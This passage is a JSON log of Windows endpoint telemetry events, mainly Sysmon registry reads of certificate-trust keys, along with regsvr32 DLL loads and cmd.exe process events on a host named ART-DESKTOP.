"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\System32\\sfc.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235890000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\System32\\sfc.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "urlmon.dll", - "image_path": "C:\\Windows\\System32\\urlmon.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": 
"C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": 
"iertutil.dll", - "image_path": "C:\\Windows\\System32\\iertutil.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\System32\\cryptbase.dll", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573236200016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "subtype": "terminate", - "timestamp": 131883573236200016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236200016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "winspool.drv", - "image_path": "C:\\Windows\\System32\\winspool.drv", - "pid": 3596, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573235740000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 7980, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": 
"\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3696, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573236439984, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3696, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573236360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", 
